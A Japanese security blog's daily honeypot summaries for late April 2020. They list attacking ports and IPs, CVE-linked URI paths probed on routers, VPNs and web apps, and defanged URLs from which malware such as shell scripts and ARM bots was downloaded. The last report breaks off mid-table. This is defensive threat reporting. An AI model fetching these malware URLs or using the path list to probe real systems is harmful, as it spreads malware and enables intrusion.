sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/25)

特に変わった通信なく、平和回でした。

Port(TOP20)

  1. Honeytrap
Port Service Count
1433 Microsoft-SQL-Server 324241 件
22 The Secure Shell (SSH) Protocol 4836 件
445 Microsoft-DS 2277 件
3389 MS WBT Server 577 件
33022 Unknown 224 件
789 Unknown 165 件
4070 Trivial IP Encryption (TrIPE) 75 件
22222 EasyEngine is CLI tool to manage WordPress Sites on Nginx server 74 件
2455 WAGO-IO-SYSTEM 71 件
9200 WAP connectionless session service 68 件
47808 Building Automation and Control Networks 67 件
1962 BIAP-MP 66 件
123 Network Time Protocol 63 件
4911 Unknown 62 件
5555 Android Debug Bridge 58 件
81 Unknown 58 件
1200 SCOL 54 件
8080 HTTP Alternate (see port 80) 52 件
7070 ARCP 52 件
4800 Icona Instant Messenging System 52 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
116[.]236[.]116[.]52 China 63009 件 Link
182[.]71[.]11[.]173 India 48434 件 Link
27[.]123[.]0[.]118 Indonesia 46904 件 Link
211[.]233[.]86[.]9 South Korea 42453 件 Link
45[.]141[.]87[.]27 Russia 29414 件 Link
116[.]22[.]196[.]179 China 24705 件 Link
83[.]209[.]70[.]50 Sweden 16497 件 Link
104[.]222[.]32[.]232 United States 15055 件 Link
1[.]168[.]12[.]85 Taiwan 13478 件 Link
185[.]202[.]1[.]19 France 12772 件 Link
185[.]202[.]1[.]189 France 11654 件 Link
113[.]165[.]233[.]194 Vietnam 11145 件 Link
27[.]255[.]58[.]30 Pakistan 7559 件 Link
118[.]172[.]54[.]237 Thailand 6012 件 Link
1[.]22[.]43[.]99 India 4978 件 Link
91[.]211[.]120[.]32 Ukraine 4854 件 Link
185[.]202[.]1[.]217 France 3692 件 Link
115[.]76[.]65[.]118 Vietnam 3247 件 Link
123[.]19[.]158[.]231 Vietnam 2946 件 Link
198[.]245[.]50[.]167 Canada 2686 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
185[.]128[.]41[.]50 Switzerland 225 件 Link
93[.]174[.]93[.]91 Netherlands 30 件 Link
129[.]150[.]94[.]63 United States 9 件 Link
132[.]145[.]101[.]248 Canada 9 件 Link
77[.]247[.]108[.]119 Estonia 8 件 Link
5[.]101[.]0[.]209 Russia 7 件 Link
179[.]223[.]173[.]249 Brazil 6 件 Link
130[.]61[.]218[.]121 Germany 6 件 Link
183[.]136[.]225[.]45 China 4 件 Link
185[.]234[.]217[.]172 Poland 3 件 Link
80[.]82[.]78[.]104 Netherlands 2 件 Link
118[.]126[.]116[.]32 China 2 件 Link
76[.]174[.]86[.]219 United States 1 件 Link
202[.]72[.]240[.]12 Mongolia 1 件 Link
193[.]118[.]53[.]194 Germany 1 件 Link
190[.]94[.]136[.]219 Ecuador 1 件 Link
122[.]228[.]19[.]80 China 1 件 Link
94[.]140[.]114[.]17 Latvia 1 件 Link
186[.]224[.]171[.]66 Brazil 1 件 Link
93[.]126[.]91[.]71 Ukraine 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
185[.]128[.]41[.]50 Switzerland 225 件 Link
93[.]174[.]93[.]91 Netherlands 30 件 Link
129[.]150[.]94[.]63 United States 9 件 Link
132[.]145[.]101[.]248 Canada 9 件 Link
77[.]247[.]108[.]119 Estonia 8 件 Link
5[.]101[.]0[.]209 Russia 7 件 Link
179[.]223[.]173[.]249 Brazil 6 件 Link
130[.]61[.]218[.]121 Germany 6 件 Link
183[.]136[.]225[.]45 China 4 件 Link
185[.]234[.]217[.]172 Poland 3 件 Link
80[.]82[.]78[.]104 Netherlands 2 件 Link
118[.]126[.]116[.]32 China 2 件 Link
76[.]174[.]86[.]219 United States 1 件 Link
202[.]72[.]240[.]12 Mongolia 1 件 Link
193[.]118[.]53[.]194 Germany 1 件 Link
190[.]94[.]136[.]219 Ecuador 1 件 Link
122[.]228[.]19[.]80 China 1 件 Link
94[.]140[.]114[.]17 Latvia 1 件 Link
186[.]224[.]171[.]66 Brazil 1 件 Link
93[.]126[.]91[.]71 Ukraine 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
/\cgi-bin/get_status[.]cgi Apexis IP CAM - -
/\cgi-bin/login[.]cgi Crestron AirMedia AM-100 CVE-2016-5639 -
/home[.]asp ASP file - -
/vpn/index[.]html - - -
/jsproxy MikroTik RouterOS - -
/tmpfs/auto[.]jpg IP camera - -
/_cluster/health Elasticsearch - -
/_stats Elasticsearch - -

02 WOWHoneypot

URI Path Target CVE Memo
/home[.]asp ASP file - -
/vpn/index[.]html - - -
/ipc$ - - -
/setup[.]php - - -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
/home[.]asp ASP file - -
/vpn/index[.]html - - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 396980 件
/ - - 346 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 43 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 30 件
login[.]cgi D-Link Router - 30 件
sip:nm Session Initiation Protocol - 22 件
/nice - - 19 件
/MyAdmin/scripts/setup[.]php Administrator - 13 件
/version - - 11 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 10 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 9 件
/api api - 7 件
/server-info Apache - 5 件
/admin/assets/js/views/login[.]js FreePBX - 5 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 5 件
/cgi CGI - 5 件
/jmx JMX - 4 件
SERVER - - 3 件
/shell MVPower DVR - 3 件
/cgi-bin/luci CGI - 3 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539 3 件
/\cgi-bin/get_status[.]cgi New - 3 件
/\cgi-bin/login[.]cgi New - 3 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 2 件
/login Login Page - 2 件
/_ping Unknown - 2 件
/home[.]asp New - 2 件
/login[.]cgi D-Link Router - 2 件
/vpn/index[.]html New - 2 件
/remote/login VPN Login - 2 件
/index[.]asp index - 2 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 2 件
/manager/html Apache Tomcat Manager - 2 件
/setup/eureka_info Google Home Hub - 2 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 1 件
/status - 2020/2/15 1 件
hxxp://aandetransportandrecovery[.]co[.]
uk/
 Unauthorized relay - 1 件
/ipp CUPS CVE-2015-1158 1 件
/info - - 1 件
rtsp:// Real Time Streaming Protocol - 1 件
/jsproxy New - 1 件
hxxp://chekfast[.]zennolab[.]com/proxy[.
]php
 Unauthorized relay - 1 件
/v1[.]40/containers/json Docker Engine API - 1 件
/admin-scripts[.]asp Administrator - 1 件
/stats - - 1 件
/db/manage/ Database - 1 件
/tmpfs/auto[.]jpg New - 1 件
/_cat/indices Elasticsearch - 1 件
/_cluster/health New - 1 件
/_stats New - 1 件
hxxp://example[.]com/ Unauthorized relay - 1 件
/solr/ Apache Solr - 1 件
/tmUnblock[.]cgi Linksys E-series - 1 件
/_search Elasticsearch - 1 件
rtsp://160[.]16[.]145[.]183:554 Real Time Streaming Protocol - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/manager/html Apache Tomcat Manager - 225 件
/ - - 35 件
/admin/assets/js/views/login[.]js FreePBX - 8 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 7 件
/index[.]asp index - 5 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 5 件
/cgi-bin/luci CGI - 4 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 4 件
/remote/login VPN Login - 4 件
/index[.]php - - 3 件
/MyAdmin/scripts/setup[.]php Administrator - 2 件
/PHPMYADMIN/scripts/setup[.]php phpMyAdmin - 2 件
/db/scripts/setup[.]php Database - 2 件
/dbadmin/scripts/setup[.]php Administrator - 2 件
/myadmin/scripts/setup[.]php Administrator - 2 件
/mysql/scripts/setup[.]php MySQL - 2 件
/mysqladmin/scripts/setup[.]php MySQL - 2 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 2 件
/home[.]asp New - 2 件
/login[.]cgi D-Link Router - 2 件
/vpn/index[.]html New - 2 件
/ipc$ New - 1 件
/solr/ Apache Solr - 1 件
/solr/admin/info/system Apache Solr - 1 件
/api/jsonws/invoke api - 1 件
/pHpMyAdMiN/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 1 件
/phpadmin/scripts/setup[.]php Administrator - 1 件
/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/sqladm/scripts/setup[.]php SQL - 1 件
/sqladmin/scripts/setup[.]php SQLAdmin - 1 件
/phpmyadmin/scripts/db___[.]init[.]php phpMyAdmin - 1 件
/phpMyAdmin/scripts/db___[.]init[.]php phpMyAdmin - 1 件
/database/scripts/setup[.]php Database - 1 件
/my/scripts/setup[.]php PHPMyAdmin - 1 件
/phpAdmin/scripts/setup[.]php Administrator - 1 件
/phpmyadmin1/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2/scripts/setup[.]php phpMyAdmin - 1 件
/pma/scripts/setup[.]php phpMyAdmin - 1 件
/scripts/setup[.]php PHPMyAdmin - 1 件
/setup[.]php New - 1 件
//wp-content/plugins/apikey/apikey[.]php Wordpress - 1 件
/portal/redlion Unknown - 1 件
/boaform/admin/formPing Administrator - 1 件
/shell MVPower DVR - 1 件
/phpmyadmin/index[.]php - - 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/ - - 8 件
/admin/assets/js/views/login[.]js FreePBX - 7 件
/cgi-bin/luci CGI - 4 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 4 件
/remote/login VPN Login - 4 件
/index[.]asp index - 4 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 4 件
/api/v1/pods api - 1 件
/solr/ Apache Solr - 1 件
/home[.]asp New - 1 件
/login[.]cgi D-Link Router - 1 件
/vpn/index[.]html New - 1 件
/owa/auth/logon[.]aspx Microsoft Exchange Server CVE-2018-16793 1 件

Malware

  1. Honeytrap
Malware Count
No Malware 397576 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 12 件
hxxp://51[.]255[.]170[.]237/pandora[.]mips 8 件
hxxp://176[.]123[.]3[.]96/arm7 2 件
hxxp://192[.]3[.]45[.]185/arm7 2 件
hxxp://5[.]206[.]227[.]18/curl 1 件
hxxp://185[.]62[.]189[.]18/jaws[.]sh 1 件
hxxp://185[.]172[.]110[.]224/ab/arm7 1 件
hxxp://178[.]32[.]148[.]5/arm7 1 件
hxxp://45[.]95[.]169[.]232/bins/mpsl 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3389 191[.]253[.]39[.]7 Brazil 298 件 Link
3389 95[.]47[.]248[.]84 Ukraine 80 件 Link
3389 117[.]4[.]115[.]55 Vietnam 73 件 Link
3389 64[.]225[.]43[.]67 United States 21 件 Link
3389 5[.]83[.]160[.]250 Germany 19 件 Link
28216 185[.]202[.]1[.]189 France 8 件 Link
28093 185[.]202[.]1[.]189 France 8 件 Link
29189 185[.]202[.]1[.]189 France 8 件 Link
28653 185[.]202[.]1[.]189 France 8 件 Link
29127 185[.]202[.]1[.]189 France 8 件 Link
28907 185[.]202[.]1[.]189 France 8 件 Link
28606 185[.]202[.]1[.]189 France 8 件 Link
27853 185[.]202[.]1[.]189 France 8 件 Link
29369 185[.]202[.]1[.]189 France 8 件 Link
29407 185[.]202[.]1[.]189 France 8 件 Link
28857 185[.]202[.]1[.]189 France 8 件 Link
28581 185[.]202[.]1[.]189 France 8 件 Link
28294 185[.]202[.]1[.]189 France 8 件 Link
28835 185[.]202[.]1[.]189 France 8 件 Link
29171 185[.]202[.]1[.]189 France 8 件 Link

Port

Port Count
3389 564 件
3391 19 件
3390 16 件
3385 16 件
3392 15 件
18148 14 件
23037 14 件
17166 14 件
23590 14 件
18027 14 件
18243 14 件
18805 14 件
28658 14 件
23382 14 件
23531 13 件
24767 13 件
17529 13 件
23461 13 件
19826 13 件
23870 13 件

IP

IP Country Count AbuseIPDB
45[.]141[.]87[.]27 Russia 29414 件 Link
185[.]202[.]1[.]19 France 12772 件 Link
185[.]202[.]1[.]189 France 11654 件 Link
185[.]202[.]1[.]217 France 3692 件 Link
185[.]158[.]113[.]43 Russia 1867 件 Link
185[.]202[.]2[.]120 France 1017 件 Link
185[.]202[.]1[.]10 France 683 件 Link
191[.]253[.]39[.]7 Brazil 298 件 Link
95[.]47[.]248[.]84 Ukraine 80 件 Link
117[.]4[.]115[.]55 Vietnam 73 件 Link
185[.]202[.]2[.]149 France 71 件 Link
185[.]153[.]196[.]99 Russia 66 件 Link
185[.]202[.]0[.]27 United Kingdom 51 件 Link
185[.]202[.]1[.]249 France 46 件 Link
185[.]202[.]0[.]25 United Kingdom 36 件 Link
185[.]202[.]1[.]85 France 32 件 Link
185[.]153[.]199[.]12 Russia 27 件 Link
195[.]54[.]160[.]77 Russia 26 件 Link
64[.]225[.]43[.]67 United States 21 件 Link
5[.]83[.]160[.]250 Germany 19 件 Link

Port 1433

IP Country Count AbuseIPDB
116[.]236[.]116[.]52 China 63009 件 Link
182[.]71[.]11[.]173 India 48434 件 Link
27[.]123[.]0[.]118 Indonesia 46904 件 Link
211[.]233[.]86[.]9 South Korea 42453 件 Link
116[.]22[.]196[.]179 China 24705 件 Link
83[.]209[.]70[.]50 Sweden 16497 件 Link
104[.]222[.]32[.]232 United States 15055 件 Link
1[.]168[.]12[.]85 Taiwan 13478 件 Link
113[.]165[.]233[.]194 Vietnam 11145 件 Link
27[.]255[.]58[.]30 Pakistan 7559 件 Link
118[.]172[.]54[.]237 Thailand 6012 件 Link
1[.]22[.]43[.]99 India 4978 件 Link
91[.]211[.]120[.]32 Ukraine 4854 件 Link
115[.]76[.]65[.]118 Vietnam 3247 件 Link
123[.]19[.]158[.]231 Vietnam 2946 件 Link
208[.]94[.]176[.]181 Saint Lucia 2534 件 Link
182[.]52[.]66[.]143 Thailand 1778 件 Link
91[.]78[.]108[.]105 Russia 1647 件 Link
85[.]111[.]0[.]137 Turkey 1543 件 Link
46[.]20[.]196[.]96 Tajikistan 1418 件 Link

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/24)

Microsoft SharePoint における脆弱性(CVE-2019-0604)の調査行為を検知していました。

Port(TOP20)

  1. Honeytrap
Port Service Count
1433 Microsoft-SQL-Server 216775 件
445 Microsoft-DS 1546 件
22 The Secure Shell (SSH) Protocol 1370 件
3391 SAVANT 434 件
3390 Distributed Service Coordinator 346 件
502 Modbus Application Protocol 259 件
6000 Unknown 198 件
3389 MS WBT Server 179 件
1723 pptp 138 件
5555 Android Debug Bridge 87 件
6001 Unknown 80 件
4022 DNOX 78 件
81 Unknown 72 件
8443 PCsync HTTPS 66 件
52869 Realtek SDK miniigd SOAP Service 65 件
8080 HTTP Alternate (see port 80) 62 件
4588 Unknown 52 件
27017 Mongo database system 50 件
7777 cbt 47 件
623 DMTF out-of-band web services management protocol 46 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
211[.]233[.]86[.]9 South Korea 47244 件 Link
27[.]123[.]0[.]118 Indonesia 42768 件 Link
113[.]165[.]233[.]194 Vietnam 26668 件 Link
116[.]236[.]116[.]52 China 25686 件 Link
185[.]202[.]1[.]19 France 11774 件 Link
46[.]98[.]1[.]108 Ukraine 9317 件 Link
116[.]22[.]196[.]179 China 6072 件 Link
46[.]30[.]161[.]235 Ukraine 5975 件 Link
203[.]81[.]76[.]246 Myanmar 5806 件 Link
101[.]28[.]3[.]65 China 5615 件 Link
203[.]210[.]197[.]130 Vietnam 5003 件 Link
180[.]249[.]133[.]138 Indonesia 4682 件 Link
124[.]81[.]84[.]130 Indonesia 4642 件 Link
113[.]203[.]251[.]209 Pakistan 4575 件 Link
27[.]203[.]232[.]72 China 4414 件 Link
91[.]226[.]190[.]33 Ukraine 4061 件 Link
78[.]85[.]5[.]145 Russia 2693 件 Link
27[.]255[.]58[.]30 Pakistan 2477 件 Link
114[.]64[.]253[.]98 China 2462 件 Link
95[.]171[.]17[.]32 Russia 2128 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
185[.]128[.]41[.]50 Switzerland 45 件 Link
218[.]108[.]72[.]2 China 32 件 Link
202[.]107[.]202[.]86 China 32 件 Link
77[.]247[.]108[.]119 Estonia 8 件 Link
42[.]200[.]207[.]42 Hong Kong 6 件 Link
35[.]225[.]205[.]210 United States 6 件 Link
195[.]53[.]63[.]178 Spain 6 件 Link
104[.]225[.]218[.]14 United States 6 件 Link
183[.]136[.]225[.]45 China 4 件 Link
36[.]26[.]70[.]136 China 4 件 Link
80[.]82[.]78[.]104 Netherlands 2 件 Link
85[.]105[.]194[.]223 Turkey 1 件 Link
162[.]243[.]129[.]224 United States 1 件 Link
45[.]195[.]146[.]140 Hong Kong 1 件 Link
73[.]36[.]129[.]198 United States 1 件 Link
128[.]14[.]133[.]58 United States 1 件 Link
176[.]202[.]25[.]11 Qatar 1 件 Link
117[.]196[.]235[.]118 India 1 件 Link
45[.]13[.]93[.]90 Germany 1 件 Link
45[.]13[.]93[.]82 Germany 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
185[.]128[.]41[.]50 Switzerland 45 件 Link
218[.]108[.]72[.]2 China 32 件 Link
202[.]107[.]202[.]86 China 32 件 Link
77[.]247[.]108[.]119 Estonia 8 件 Link
42[.]200[.]207[.]42 Hong Kong 6 件 Link
35[.]225[.]205[.]210 United States 6 件 Link
195[.]53[.]63[.]178 Spain 6 件 Link
104[.]225[.]218[.]14 United States 6 件 Link
183[.]136[.]225[.]45 China 4 件 Link
36[.]26[.]70[.]136 China 4 件 Link
80[.]82[.]78[.]104 Netherlands 2 件 Link
85[.]105[.]194[.]223 Turkey 1 件 Link
162[.]243[.]129[.]224 United States 1 件 Link
45[.]195[.]146[.]140 Hong Kong 1 件 Link
73[.]36[.]129[.]198 United States 1 件 Link
128[.]14[.]133[.]58 United States 1 件 Link
176[.]202[.]25[.]11 Qatar 1 件 Link
117[.]196[.]235[.]118 India 1 件 Link
45[.]13[.]93[.]90 Germany 1 件 Link
45[.]13[.]93[.]82 Germany 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
/remote/login VPN Login - -
/index[.]asp index - -
/htmlV/welcomeMain[.]htm Verizon Modem Router - -
/setup/index[.]jsp Openfire Server 3.6.0a - -
/sdk Nmap(vmware) - -
/smb_scheduler/cdr[.]htm SIM Bank Scheduler Server - -

02 WOWHoneypot

URI Path Target CVE Memo
/remote/login VPN Login - -
/index[.]asp index - -
/htmlV/welcomeMain[.]htm Verizon Modem Router - -
/Temporary_Listen_Addresses/SMSSERVICE Microsoft SharePoint CVE-2019-0604 -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
/remote/login VPN Login - -
/index[.]asp index - -
/htmlV/welcomeMain[.]htm Verizon Modem Router - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 239495 件
/ - - 602 件
/index[.]action Apache Struts 2 CVE-2017-5638 74 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 65 件
login[.]cgi D-Link Router - 40 件
/nice - - 24 件
sip:nm Session Initiation Protocol - 24 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 21 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 18 件
/live/CPEManager/AXCampaignManager/delet
e_cpes_by_ids
 Zyxel CNM SecuManager - 9 件
hxxp://112[.]35[.]88[.]28:8088/index[.]p
hp
 - - 9 件
hxxp://112[.]35[.]66[.]7:8088/index[.]ph
p
 - - 8 件
hxxp://112[.]35[.]63[.]31:8088/index[.]p
hp
 - - 8 件
/cgi CGI - 7 件
/version - - 6 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 5 件
/shell MVPower DVR - 5 件
/cgi-bin/luci CGI - 5 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 5 件
/remote/login New - 5 件
/index[.]asp New - 5 件
/htmlV/welcomeMain[.]htm New - 5 件
/admin/assets/js/views/login[.]js FreePBX - 4 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 4 件
/_search Elasticsearch - 4 件
hxxp://example[.]com/ Unauthorized relay - 3 件
hxxp://112[.]35[.]53[.]83:8088/index[.]p
hp
 - - 3 件
/service/extdirect Sonatype Nexus Repository Manager CVE-2019-7238 2 件
/jars Unknown - 2 件
/slave Unknown - 2 件
/api api - 2 件
/api/v1/targets api - 2 件
/api/v1/label/version/values api - 2 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 2 件
/wls-wsat/CoordinatorPortType11 Weblogic CVE-2017-10271 2 件
/_ping Unknown - 2 件
/nmaplowercheck1587732126 Nmap - 2 件
/setup/index[.]jsp New - 1 件
/info - - 1 件
/solr/admin/cores Apache Solr - 1 件
/console - - 1 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 1 件
SERVER - - 1 件
/server-info Apache - 1 件
/stats - - 1 件
/db/manage/ Database - 1 件
/PSBlock Supermicro IPMI - 1 件
/v1[.]16/version - - 1 件
/TP/public/index[.]php - - 1 件
/users - - 1 件
hxxp://aandetransportandrecovery[.]co[.]
uk/
 Unauthorized relay - 1 件
/status - 2020/2/15 1 件
/securityRealm/user/admin/search/index Administrator - 1 件
/v1[.]40/containers/json Docker Engine API - 1 件
/sdk New - 1 件
/evox/about Nmap - 1 件
/HNAP1 Linksys Router D-Link Router 1 件
/solr/admin/info/system Apache Solr - 1 件
/jmx JMX - 1 件
/manager Apache Tomcat Manager - 1 件
/smb_scheduler/cdr[.]htm New - 1 件
/ws/v1/cluster Apache Hadoop - 1 件
/admin/test/systemProperties[.]jsp Administrator - 1 件
/hudson Unknown - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/index[.]action Apache Struts 2 CVE-2017-5638 60 件
/ - - 45 件
/manager/html Apache Tomcat Manager - 45 件
/admin/assets/js/views/login[.]js FreePBX - 8 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 7 件
/cgi-bin/luci CGI - 4 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 4 件
/remote/login New - 4 件
/index[.]asp New - 4 件
/htmlV/welcomeMain[.]htm New - 4 件
/TP/public/index[.]php - - 3 件
ip[.]ws[.]126[.]net:443 Unauthorized Relay - 2 件
/Temporary_Listen_Addresses/SMSSERVICE New - 1 件
/portal/redlion Unknown - 1 件
/adv,/cgi-bin/weblogin[.]cgi Zyxel NAS CVE-2020-9054 1 件
/status - 2020/2/15 1 件
/hudson Unknown - 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/ - - 30 件
/remote/login New - 9 件
/admin/assets/js/views/login[.]js FreePBX - 8 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 8 件
/cgi-bin/luci CGI - 8 件
/index[.]asp New - 7 件
/htmlV/welcomeMain[.]htm New - 6 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 2 件
/ajax - - 1 件
/data[.]php - - 1 件
/login[.]htm Login Page - 1 件
/index[.]php - - 1 件
/owa/auth/logon[.]aspx Microsoft Exchange Server CVE-2018-16793 1 件

Malware

  1. Honeytrap
Malware Count
No Malware 240466 件
hxxp://51[.]255[.]170[.]237/pandora[.]mips 11 件
hxxp://178[.]33[.]64[.]107/arm7 10 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 8 件
hxxp://80[.]211[.]110[.]143:1691/dvrbot[.]arm7 3 件
hxxp://176[.]123[.]3[.]96/arm7 3 件
hxxp://190[.]115[.]18[.]144/sh/wget 2 件
hxxp://212[.]114[.]52[.]128/arm7 2 件
hxxp://pm[.]cpuminerpool[.]com/pm[.]sh 1 件
hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 1 件
hxxp://185[.]172[.]110[.]224/ab/arm7 1 件
hxxp://178[.]32[.]148[.]5/arm7 1 件
hxxp://185[.]62[.]189[.]18/jaws[.]sh 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3390 209[.]45[.]61[.]241 Peru 332 件 Link
3391 209[.]45[.]61[.]241 Peru 331 件 Link
3389 95[.]47[.]248[.]84 Ukraine 80 件 Link
5366 185[.]202[.]1[.]101 France 16 件 Link
3389 150[.]138[.]119[.]11 China 9 件 Link
3389 13[.]67[.]178[.]244 United States 8 件 Link
3389 83[.]48[.]94[.]126 Spain 7 件 Link
3389 211[.]195[.]9[.]145 South Korea 6 件 Link
23961 185[.]202[.]1[.]19 France 4 件 Link
17146 185[.]202[.]1[.]19 France 4 件 Link
23753 185[.]202[.]1[.]19 France 4 件 Link
25453 185[.]202[.]1[.]19 France 4 件 Link
19912 185[.]202[.]1[.]19 France 4 件 Link
18398 185[.]202[.]1[.]19 France 4 件 Link
25239 185[.]202[.]1[.]19 France 4 件 Link
18144 185[.]202[.]1[.]19 France 4 件 Link
18291 185[.]202[.]1[.]19 France 4 件 Link
18752 185[.]202[.]1[.]19 France 4 件 Link
24341 185[.]202[.]1[.]19 France 4 件 Link
24672 185[.]202[.]1[.]19 France 4 件 Link

Port

Port Count
3390 346 件
3391 341 件
3389 170 件
5366 16 件
3392 10 件
6000 10 件
3388 7 件
18144 6 件
18399 6 件
24744 6 件
16923 6 件
24110 6 件
3393 6 件
17146 5 件
18398 5 件
24077 5 件
19573 5 件
25227 5 件
17324 5 件
24267 5 件

IP

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 11774 件 Link
185[.]158[.]113[.]43 Russia 1480 件 Link
185[.]202[.]2[.]120 France 967 件 Link
185[.]202[.]1[.]10 France 831 件 Link
185[.]202[.]1[.]217 France 732 件 Link
185[.]202[.]1[.]85 France 704 件 Link
209[.]45[.]61[.]241 Peru 663 件 Link
195[.]54[.]167[.]115 Russia 94 件 Link
185[.]202[.]1[.]183 France 83 件 Link
95[.]47[.]248[.]84 Ukraine 80 件 Link
185[.]202[.]0[.]25 United Kingdom 61 件 Link
91[.]241[.]19[.]173 Russia 48 件 Link
185[.]202[.]1[.]28 France 36 件 Link
185[.]153[.]196[.]99 Russia 28 件 Link
185[.]202[.]1[.]187 France 27 件 Link
92[.]63[.]194[.]70 Russia 25 件 Link
185[.]202[.]1[.]101 France 16 件 Link
41[.]216[.]186[.]89 St Kitts and Nevis 13 件 Link
185[.]176[.]222[.]39 Latvia 13 件 Link
185[.]153[.]199[.]12 Russia 11 件 Link

Port 1433

IP Country Count AbuseIPDB
211[.]233[.]86[.]9 South Korea 47244 件 Link
27[.]123[.]0[.]118 Indonesia 42768 件 Link
113[.]165[.]233[.]194 Vietnam 26668 件 Link
116[.]236[.]116[.]52 China 25686 件 Link
46[.]98[.]1[.]108 Ukraine 9317 件 Link
116[.]22[.]196[.]179 China 6072 件 Link
46[.]30[.]161[.]235 Ukraine 5975 件 Link
203[.]81[.]76[.]246 Myanmar 5806 件 Link
101[.]28[.]3[.]65 China 5615 件 Link
203[.]210[.]197[.]130 Vietnam 5003 件 Link
180[.]249[.]133[.]138 Indonesia 4682 件 Link
124[.]81[.]84[.]130 Indonesia 4642 件 Link
113[.]203[.]251[.]209 Pakistan 4575 件 Link
27[.]203[.]232[.]72 China 4414 件 Link
91[.]226[.]190[.]33 Ukraine 4061 件 Link
78[.]85[.]5[.]145 Russia 2693 件 Link
27[.]255[.]58[.]30 Pakistan 2477 件 Link
114[.]64[.]253[.]98 China 2462 件 Link
95[.]171[.]17[.]32 Russia 2128 件 Link
182[.]0[.]132[.]185 Indonesia 1771 件 Link

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/23)

ポート 110 番(POP3)の検知数が増加していました。通信自体は調査行為止まりでしたが。。。

Port(TOP20)

  1. Honeytrap
Port Service Count
1433 Microsoft-SQL-Server 173371 件
110 Post Office Protocol - Version 3 3222 件
445 Microsoft-DS 2187 件
22 The Secure Shell (SSH) Protocol 1145 件
3390 Distributed Service Coordinator 479 件
3391 SAVANT 475 件
2222 SSH 228 件
8080 HTTP Alternate (see port 80) 174 件
3389 MS WBT Server 161 件
20000 DNP 109 件
873 rsync 100 件
389 Lightweight Directory Access Protocol 98 件
514 cmd like exec, but automatic authentication is performed as for login server 95 件
6093 Unknown 94 件
503 Intrinsa 91 件
2717 PN REQUESTER 91 件
1056 VFO 90 件
6001 Unknown 83 件
1041 AK2 Product 82 件
587 Message Submission 82 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
202[.]1[.]114[.]202 Philippines 27138 件 Link
36[.]78[.]201[.]226 Indonesia 25453 件 Link
106[.]3[.]43[.]25 China 17848 件 Link
103[.]205[.]140[.]73 India 12071 件 Link
185[.]202[.]1[.]19 France 11021 件 Link
31[.]156[.]3[.]35 Italy 10503 件 Link
116[.]232[.]155[.]70 China 8033 件 Link
115[.]75[.]48[.]138 Vietnam 7704 件 Link
160[.]202[.]65[.]90 United States 7589 件 Link
45[.]141[.]87[.]27 Russia 7532 件 Link
36[.]83[.]48[.]227 Indonesia 6638 件 Link
54[.]38[.]53[.]123 France 5651 件 Link
190[.]38[.]83[.]38 Venezuela 5309 件 Link
118[.]70[.]116[.]236 Vietnam 4573 件 Link
221[.]215[.]205[.]122 China 4468 件 Link
182[.]0[.]132[.]185 Indonesia 4319 件 Link
